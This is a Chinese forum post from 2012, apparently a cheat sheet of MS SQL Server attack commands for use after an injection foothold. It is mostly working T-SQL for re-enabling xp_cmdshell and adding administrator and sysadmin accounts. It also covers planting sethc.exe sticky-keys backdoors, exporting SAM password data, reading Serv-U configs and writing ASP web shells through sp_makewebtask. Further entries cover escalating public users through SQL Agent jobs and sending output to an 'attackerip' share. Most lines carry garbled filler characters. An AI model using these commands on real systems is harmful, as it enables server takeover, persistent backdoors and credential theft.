1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号$ B, Q) u3 U& }9 V( E, |% ^0 |
恢复方法:查询分离器连接后,
8 o0 y9 P+ G! y& W ~第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 2 ~# y) D4 D* i8 l2 r' ?/ q' J
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
@; q( X5 x. l% z: p( ?然后按F5键命令执行完毕! N* q" H" P j9 A1 u/ o' S
& F8 I" e0 p Y- y2 ]2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
; m. f! t9 i1 W6 B: S4 _: H# P恢复方法:查询分离器连接后,; s% a; M6 z" d6 d( a4 w# i( _
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"# x; W% U+ u1 L% o! `, m& D
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 G$ Y4 N) C1 [) b然后按F5键命令执行完毕
\% f8 b: e. g$ ^3 U
! L3 g$ f! P& L$ \+ y+ f8 Q3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
# J+ i4 `8 c# S9 S6 @( b恢复方法:查询分离器连接后,0 ~* e, y* V2 j" S' W) g/ z7 s
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
( `) ] G+ ]7 i7 }9 C* a第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
# `, Y2 a: j1 W6 F( R% C$ T然后按F5键命令执行完毕9 p: D/ K ^+ E% m
( Y. g9 t/ J2 |0 p( S2 J4 终极方法.: \, B2 E$ m7 S. z6 h
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
+ m/ X# [. @7 ]0 c2 `4 Y1 N查询分离器连接后,
" [8 o& ]& m9 L: I2000servser系统:0 K# P3 S/ J& z) I7 B+ q: \
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
( s) g) d) i) E* F' h. E1 L9 b' j# j! p; |4 g) Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'0 Z1 V% w" o2 _% {6 |1 E4 p
' V) h) M7 k7 h0 O. fxp或2003server系统:
! i. g# p( w/ c- R1 ]- ?2 T4 T
1 [" t4 x- O, D; adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
. @/ B/ j, {+ E$ V- w- t z. _. l+ [
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'' k) K+ w$ `1 h, f
' W9 v9 K- O$ u2 z+ C
5 J* m! H) c; k ]$ ]/ w& V, a) a五个SHIFT
# {; K H# R" V6 q, C4 R7 Ldeclare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
; [9 h* ~: k0 u* a0 U! o K# J- K4 Y% e* R
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; ; ~7 V6 U" x! a) l7 V- M
) i* u5 b2 Q- L6 z& L" Lxp_cmdshell执行命令另一种方法" S" j% K0 d$ v
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
/ w3 t, A) h, P2 d0 O1 r4 _7 s% U6 P* s$ U2 D& B* g* \' D* @( r
判断存储扩展是否存在2 E, M; j1 ^" |
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
9 U% r" j6 z ~% Q- l! a返回结果为1就OK
1 Y2 I0 O, r6 U( G% I$ N
' |4 i. |9 T0 ]" K2 Q5 f* L- {" \$ p& I' w% m+ y) ~5 Y$ w
上传xplog70.dll恢复xp_cmdshell语句:
8 t' S3 a5 g8 z# r% f) K. i B$ gsp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'% Y, x6 n0 I8 `/ E
' u# Y$ r$ X1 X' z' G
否则上传xplog7.0.dll; o5 |3 Q* q. a% ~; a
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
4 F$ C" L' H3 u
! s! }: H" ?* y8 b9 u. b9 \. p: G% l {% m
) [4 J/ N- q) A
首先开启沙盘模式:; }$ ~( ?% I' @; `! w; D
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1+ M1 A6 B5 l1 p) b0 W
D2 F: P* N* `5 ]! o2 ^然后利用jet.oledb执行系统命令7 n- X/ W% r; s) E
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')! L) e! O* n1 [% t) _' k
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
/ d- N* b+ [" J1 C# H: |) F6 N+ Q5 f$ x! e3 [! B
0 @1 i: n; k$ B+ G$ Y4 U/ t
9 s( f! M# B$ |恢复过程sp_addextendedproc 如下:
; @' A% h4 N% F" F% o7 wcreate procedure sp_addextendedproc --- 1996/08/30 20:13
( b. S: D( T0 a& f# L@functname nvarchar(517),/* (owner.)name of function to call */ $ g; u t% F* l1 r3 K6 s8 O; [
@dllname varchar(255)/* name of DLL containing function */ ! m/ ~0 s; g8 @; b
as
- t& G, v' T& {) \) wset implicit_transactions off
% d) y' v9 ?- [1 X( I X( j; nif @@trancount > 0
0 b# i/ m4 |; L" t; z0 Q4 E- gbegin
' `' i X' @% Wraiserror(15002,-1,-1,'sp_addextendedproc') ) s0 A" m1 D! q* ]' v- V7 V
return (1) ) ~- Q/ \- N5 v3 p! y) s
end
3 @# f7 \( Q6 m" `dbcc addextendedproc( @functname, @dllname)
8 t1 @, h, i/ k* K: zreturn (0) -- sp_addextendedproc
& m, U* a; O1 [6 aGO
( t- H7 I: Q9 P4 m. _/ P8 T0 i$ b" ^* D# X( x' o. a
& y, M% e" Y% _% o
% p% G$ _5 H0 f1 ]. y! S1 S导出管理员密码文件
2 B# \0 f" d" I8 j0 Csa默认可以读sam键.应该。6 Q7 J2 i# p( r) V
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
8 ~. j/ k! K4 M$ m! b& k }+ Lnet user administrator test
/ o4 a0 `5 _# _% r用administrator登陆.
! X' P, v- E, U% G3 P7 j8 H用完机器后
0 b2 q& p/ |- f1 Nreg import c:\test.reg
) Q5 F+ I1 s* U. _" u; \& V根本不用克隆.
5 ^; {9 j2 G" j4 }找到对应的sid.
% e+ n6 S: a: V% J, R; r; s ^$ c
2 E4 I/ M; k7 C o) K# u8 o
g$ R+ W- O; y
恢复所有存储过程
! C* ]4 B5 H6 R- g. V% s/ \use master
( Z! R" q( _* `4 J" a* _. ?& jexec sp_addextendedproc xp_enumgroups,'xplog70.dll'
) {7 C0 M( T) C6 R- |- T8 E- aexec sp_addextendedproc xp_fixeddrives,'xpstar.dll' . W, H5 |0 M" s
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
" B9 G/ K' ^8 A8 Hexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
* [. I3 C1 A: I# V9 Uexec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
% `5 h x- d" v+ d2 y, uexec sp_addextendedproc sp_OACreate,'odsole70.dll'
# b" [ b0 H' z; Texec sp_addextendedproc sp_OADestroy,'odsole70.dll' 3 |( ?$ a l; N. O" G6 N6 k$ S
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
1 m" y: g" `" c4 ]$ ~. Bexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' % m6 P% B# _3 y
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' % ^4 p# ^3 W* {
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
4 M8 K6 {8 u! e |% \7 w7 rexec sp_addextendedproc sp_OAStop,'odsole70.dll'
2 v& g2 u" p0 i0 s6 kexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 7 e+ i% x% U1 o* D X
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' 3 _5 G0 r3 e j, O c$ r0 |/ G
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
! U m# e% w) S- V! Aexec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
2 P& ^# b# V# U! j# P+ V/ ?- @exec sp_addextendedproc xp_regread,'xpstar.dll'
/ U; ~) @: y. l jexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 4 s& r! ]/ \% E" J# T7 k& X! f
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
4 |0 u) S) H9 C+ P9 w; T5 iexec sp_addextendedproc xp_availablemedia,'xpstar.dll'
& } D; g6 g; P4 @
9 D4 O. c6 d" M0 K
* }9 d1 ~2 ?+ A+ {) n! _5 u6 }/ ^建立读文件的存储过程3 P7 n+ B% T6 I# `* N, d
Create proc sp_readTextFile @filename sysname. C% k; e4 f4 z2 @; k7 o
as J) e$ ~3 }. r
1 e4 Q. c" p- V
begin
! T7 ]' _; J! e set nocount on
( y" i" Q, Q3 p7 N Create table #tempfile (line varchar(8000))
. H. m0 u, _! z. ^& R3 h exec ('bulk insert #tempfile from "' + @filename + '"')
" \4 ]8 \4 ~9 z& n select * from #tempfile8 \% W+ k- s* U- v0 o
drop table #tempfile& m5 ~/ w. D5 P" e
End9 g% A) B/ L2 q8 G: C
5 {8 F0 I' |% b% [' E9 P& ?exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
! Z4 b+ i M# Z; p+ u$ \查看登录用户& K# h8 @. e+ W
Select * from sysxlogins
2 K8 ]( v8 X. _3 b
& y |, E7 H. {' f把文件内容读取到表中
; s, r e. Z0 S: S- x1 JBULK INSERT tmp from "c:\test.txt"
& Y4 O; \2 r2 Z6 b% |2 tdElete from 表名 清理表里的内容, a) J6 J: q) d7 Z
create table b_test(fn nvarchar(4000));建一个表,字段为fn
$ }: l- q% `7 s. x M& P
! v1 V9 s; Z8 I4 U2 I
' v3 O6 `5 M! b$ W# ]% k加sa用户% \) O' d/ r- ~: t: u
exec master.dbo.sp_addlogin user,pass;, L; ?( ^8 ?+ c( j: b- _
exec master.dbo.sp_addsrvrolemember user,sysadmin
) ~7 u, V1 i$ A9 l5 o
0 }8 m+ n: e1 G+ R1 a N* ?" {6 i( \! ]% c
/ R" U& K3 f5 o+ U6 o读文件代码4 }* X% w6 @1 ^
declare @o int, @f int, @t int, @ret int
, Z. X( E9 `0 K4 udeclare @line varchar(8000)1 s4 k% ?: m$ N4 P! u& k" x b
exec sp_oacreate 'scripting.filesystemobject', @o out% T! V7 m( {1 q/ C" c& q
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1& Z: s+ T0 H* K0 c8 c) |
exec @ret = sp_oamethod @f, 'readline', @line out1 d) ]' ]" a1 ?4 N5 K- H* ]
while( @ret = 0 )6 W- F0 R, s& i8 O
begin
& W) c! u' v$ V8 p1 Eprint @line5 G( t2 H- ~( j4 u& d
exec @ret = sp_oamethod @f, 'readline', @line out
8 {* J) `: W' M$ W) ^4 W7 |1 x5 u1 \end
" M7 T5 W3 D# M( Y6 g* b: E6 }( I. n: k) I9 J
! P+ K* \- G; Z2 {) l" ~3 C0 G& `! c) N. K
写文件代码:
, s1 o9 J: L" L9 M& w4 adeclare @o int, @f int, @t int, @ret int
' q# q3 H" [: c! rexec sp_oacreate 'scripting.filesystemobject', @o out
- T" M+ D6 s* fexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1! Y0 u2 R5 r7 V9 _0 b
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》! a3 y& M6 Q: x T% y/ W. m
# ~) r+ c! W- B- @1 Z
* {2 B; \0 W/ ^; I
添加lake2 shell1 L, }3 n2 s- U- [
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
, T$ _, f$ O v6 d+ A9 fsp_dropextendedproc xp_lake2
& q4 e# x, `- @EXEC xp_lake2 'net user'
3 R6 M8 b% R( n8 Q) h
* t3 y& f" w8 j) @
5 B W' t: q" X+ o得到硬盘文件信息
& Q3 f9 c# c1 V: M, X' P3 e5 T--参数说明:目录名,目录深度,是否显示文件 5 O9 I1 E6 x2 z( i/ n$ Q
execute master..xp_dirtree 'c:'
: Y; S$ T, [$ t$ @3 ], L$ |" Aexecute master..xp_dirtree 'c:',1 + _% O N: B( B2 y( k' D
execute master..xp_dirtree 'c:',1,1
3 r( C$ {: j1 M7 W+ j! l5 v# L9 {. e0 B1 e4 n, V* O( g
& Z% c5 j. |5 x$ }读serv-u配置信息
7 e0 m+ r, y f D% r7 Aexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
! K3 ~' A( k* X1 ]; M+ E3 ^exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
( M! d' }' B. k u) n% `
, P3 @5 I) x& U3 C% q% e2 [通过xp_regwrite写SHIFT后门0 ^: t) j+ T$ E( |/ V) L [1 ^. E
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--4 o* d1 Z3 p, N/ a' a$ c5 t3 D" C, _
' {0 g8 x7 h6 {0 d; K1 z
) V7 i8 l- z/ @4 c3 j, N1 F
% B' g G; }1 l% Q' ?) I
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';# i2 d8 n, a$ `, {" F% _) w
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
( E7 @* A" E7 T8 k6 f
8 w& `0 T. ?$ k$ H' N4 a1 aEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'. ~6 a7 P. x, Y4 m
. m/ t1 k% N7 @/ T
# a0 ]6 j9 L2 c3 k2 Q8 ~: b9 n: J
sql server 2005下开启xp_cmdshell的办法
3 P# b) E) a" Z. T T
2 `5 O$ T& y- x3 z% X+ v" g6 z: d3 `EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
1 Z- Z' x" l) p# W2 p& k# U, x5 [% Y3 C, G# ]
SQL2005开启'OPENROWSET'支持的方法:/ s0 r, |/ E7 d1 _
9 f L+ j# R$ a
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
2 n: n8 U: O8 X; s3 e2 u) A8 U: V( h3 [! U" q: j9 ?
SQL2005开启'sp_oacreate'支持的方法:
( c. |, p9 l5 Z1 }/ A
/ [3 z7 Y( b3 F* P" vexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
G8 x! i" X% ~! b- L. ?# Y
) k5 |# s$ i9 E8 B1 ^3 t! }* ^
0 K; g% o6 j& k- E6 L0 D
/ g8 r f" P" W* Y
$ e! P# Z' U% x, g7 h, @
8 z$ c$ ~; _5 E: x( A
4 e7 a2 C! o5 B) F# x( h0 ]: T
' Q9 d/ V. q- q+ }
7 u9 {, i% D8 A2 a F( q( t
/ o: f# B* u5 m! `2 Y3 z, N$ `1 i2 I B
* X- W y7 B; R2 w4 ?" J' M* a9 O
; i; `0 Q6 q0 S) z- X" j$ m
" y9 Y- `& {# E9 i- E% G7 _' s' z! M# ]9 h
: N0 y6 S3 f! Q
% U5 L X8 u, m5 x/ N% Q9 G
3 R+ r/ S9 o! d
& _1 |, k0 k) N0 C. g0 c. |* j& i l+ ^& U/ n
* \' M) f5 f; O" h* ]; Y" c9 `2 d2 E. |
" B1 ^& P: y9 Z+ h+ I, w" P! y1 Q: l: t& U+ d
" A2 K' Y5 f2 q" E! h3 v$ t以下方面不知道能不能成功暂且留下研究哈:
& X; n3 Q9 Y& K/ y7 V8 f' |4)( a' ?1 p2 a1 D `4 {. k
use msdb; --这儿不要是master哟
( a) ~- j. u3 O7 f6 M: nexec sp_add_job @job_name= czy82 ;' K- I4 E% Z! d+ N0 k
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
" d2 h, v( z3 fexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
* h8 X4 k1 {8 p# K& W& `exec sp_start_job @job_name= czy82 ;7 t. v4 e* D5 u' n; Q8 X* ?. o
7 C) N! V3 } k8 L; Q利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
$ w% }* |) J$ R& g. b, ~执行tsql语句了.* H( A9 X6 y2 f' z" j
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
- S9 j" B! B* a" a) [' X& I" R8 w第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
2 F* x/ p" }6 Q1 @# Fnet start SQLSERVERAGENT
6 u4 T% O& H r! B3 {( |. g
7 t- A. G* p w. o7 ?对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
" t2 Y2 [& y$ E5 u( VUSE msdb* R" G7 U1 _8 l7 K j' O/ I
EXEC sp_add_job @job_name = GetSystemOnSQL ,3 f1 [0 h! r2 c9 `
@enabled = 1,
8 l- X* [* _9 f" b@description = This will give a low privileged user access to/ ?% Y- Y2 H5 w. i# S" E% K
xp_cmdshell ,. d" R0 `/ u: ^
@delete_level = 1
1 l3 E4 y5 ^* |8 g! O- r# AEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,( [+ X5 R9 y( x3 u; t/ Z
@step_name = Exec my sql ,
1 R6 g1 ~4 Y6 l/ V% H@subsystem = TSQL ," {- Q0 f4 \. [1 V- p ~5 ~: ]' U: p
@command = exec master..xp_execresultset N select exec
1 T& v0 h9 q/ E4 T: omaster..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master 5 o" n2 H3 A5 H$ p' j9 \
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
3 `6 D( Z3 G2 s5 Z7 t@server_name = 你的SQL的服务器名 _" _$ U2 E) J B
EXEC sp_start_job @job_name = GetSystemOnSQL
- a, ^& F3 S1 I3 c" \2 |
+ `/ Q" O# o4 A; t. ^4 q, y不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以& G9 Q1 B! ]1 s9 ]/ w; x) v
才让我们可以以public执行xp_cmdshell7 W' o3 R. Z6 b! G3 _
3 P, H- a" W5 ?/ v- G4 E- m w; F' Q5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)+ _0 a& A3 i6 s2 J* U7 P* ?
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968 n8 _" R! v) n6 E7 Y
7 r$ r( f% \2 ]$ HUSE msdb; g+ O; {* M! ]4 W* E
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
6 [ ?! L5 G1 F9 J8 k, e( G) ~@enabled = 1,
% X6 ?/ T W- d, F@description = This will create a file called c:\sqlafc123.txt ,
: G; E, {& D2 k _' V5 c- ]@delete_level = 1
- n5 q. C2 e: l6 P3 f- T$ [: NEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
# j. W0 Z/ @# T. W" W@step_name = SQLAFC ,2 s4 {9 U$ Q4 ?- @
@subsystem = TSQL ,
2 K# O# v* o8 C: c+ s@command = select hello, this file was created by the SQL Agent. ,
% ]7 D0 b- ^& ^6 q- _! c@output_file_name = c:\sqlafc123.txt " @5 Y4 f. S* o! x$ f: w' P- Y
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
/ O" z% F [' L- t W2 f, t3 ~( v@server_name = SERVER_NAME
; S+ K( @! Y- W5 p: LEXEC sp_start_job @job_name = ArbitraryFilecreate ) [' `) p! i2 \ ?- S2 D
, l) p- }5 b1 W6 |
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
5 x& A6 Z6 `% L& L4 g4 D* S7 r1 T/ z# t8 Q' f& u( U
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:199 S. P5 ?$ O. w# z( C
----------------------------------------------5 m1 [7 m7 J0 P: y. f6 f
hello, this file was created by the SQL Agent.
+ M5 d3 O1 V) {6 i
5 l$ M% }9 r/ t( z7 V% h. Q(1 ?????)' @8 H' }$ G+ n& M; u# K
$ e8 z; q" P. @2 i所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员" r$ i% p, ]& V. y
命令的vbs文件到启动目录!, S0 S) q6 {9 t7 Q/ N% y e
* ]! e+ R: ?" }; D$ [+ U6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
- i( z) S# }6 \& n6 X关于sp_MScopyscriptfile 看下面的例子, n- r$ M# v7 F- I& P
declare @command varchar(100)
* ], {7 {& r! E4 v$ Jdeclare @scripfile varchar(200) & x' |2 T5 v# M/ y! f/ G( a d
set concat_null_yields_null off $ }7 h+ c$ v) O, D2 M# e+ ~
select @command= dir c:\ > "\\attackerip\share\dir.txt"
) O# v! |4 m' ~; C1 U( b# ?select @scripfile= c:\autoexec.bat > nul" | @command | rd "
# e) `& J! B) m3 @- xexec sp_MScopyscriptfile @scripfile ,
$ Q3 O) g- {8 `2 \' B9 a
% G* A2 i# m+ M) _, \这两个东东都还在测试试哟 t7 M8 C8 Q8 o& |
让MSSQL的public用户得到一个本机的web shell
, v) W4 ]# [6 u4 [/ k& ^, |8 q! B% O8 ?" u; v+ H: Q0 V
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,- q# t- B- o- W
--@query= select <img src=vbscript:msgbox(now())>
/ A5 K: m/ U- P/ e; T--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
# F3 b: Y/ A: R- F8 T% |@query= select 9 L( T" S, I8 f$ Y& L" X3 t
<%On Error Resume Next
6 D$ t8 F* `7 V* g. aSet oscript = Server.createObject("wscript.SHELL")
2 [" K' Y K5 z( B$ rSet oscriptNet = Server.createObject("wscript.NETWORK") 0 u7 k4 {3 V6 ~5 H2 c9 K) Q, z
Set oFileSys = Server.createObject("scripting.FileSystemObject") 9 t; {! J0 q7 {# o
szCMD = Request.Form(".CMD")
& u; c5 E9 b) D8 rIf (szCMD <>"")Then , h( n& G3 f* z8 b/ b; g* Z
szTempFile = "C:\" & oFileSys.GetTempName()
- f t: i% d# L2 r5 m. SCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) # h1 R& n2 q& W, v+ g
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) ) G# S* E! n N% O; H( s
End If %>
0 b2 R' X) y8 G3 ]3 q; z. ~<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
+ r% i( x9 M) b! x2 y' K<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
- C% ~6 R6 B$ z. p* g/ a</FORM><RE>
( W# r2 c( J8 `& I$ c2 a<% If (IsObject(oFile))Then c! Y; a/ n7 I! M) S2 @
On Error Resume Next 4 U8 P- V7 I4 h8 \; b! L2 V2 Y, ^( z2 I+ W
Response.Write Server.HTMLEncode(oFile.ReadAll) 7 e5 N5 G! d: C9 ], ?
oFile.Close
0 C- M5 ?0 T6 cCall oFileSys.deleteFile(szTempFile, True) & b/ l4 \: D8 h5 ?
End If%> 8 o+ \* x# Q: X1 G9 s) l' \
</BODY></HTML>
( ~' ]- ?( g1 D) G$ f- v |
发表于 2012-9-15 14:37:30
收藏
支持
反对